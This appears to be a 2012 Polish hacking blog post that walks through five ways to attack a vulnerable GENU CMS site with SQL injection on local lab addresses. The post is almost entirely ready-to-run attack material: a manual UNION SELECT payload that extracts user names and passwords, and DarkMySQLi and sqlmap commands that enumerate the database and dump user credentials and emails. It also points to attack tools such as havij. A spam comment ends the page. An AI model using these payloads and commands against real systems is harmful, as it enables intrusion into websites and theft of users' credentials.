poniedziałek, 9 kwietnia 2012

Advanced sql injection (5 sposobow jak przejac kontrole nad strona www)

havij | manual | mms_05.jar | DarkMySQLi | sqlmap
download podatnego systemu cms do pobrania z tad
http://www.exploit-db.com/exploits/18708/
1. havij
download
http://itsecteam.com/en/projects/project1_page2.htm
2. manual
http://192.168.1.102/GENU-2012.3/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
3. mms_05.jar
download
http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
java -jar mms_05.jar
http://192.168.1.104/GENU-2012.3/
4. DarkMySQLi
cd /pentest/web/darkmysqli
python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --findcol

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --dbs

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --full

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" -D baza -T genu_users -C user_name,user_password --dump

5. sqlmap
cd /pentest/database/sqlmap/
python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --dbs

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza --tables

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users --columns

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users -C user_email,user_name,user_password --dump

GAME OVER

1 komentarz:

  1. If you need your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you must watch this video
    right away...

    (VIDEO) Have your ex CRAWLING back to you...?

    OdpowiedzUsuń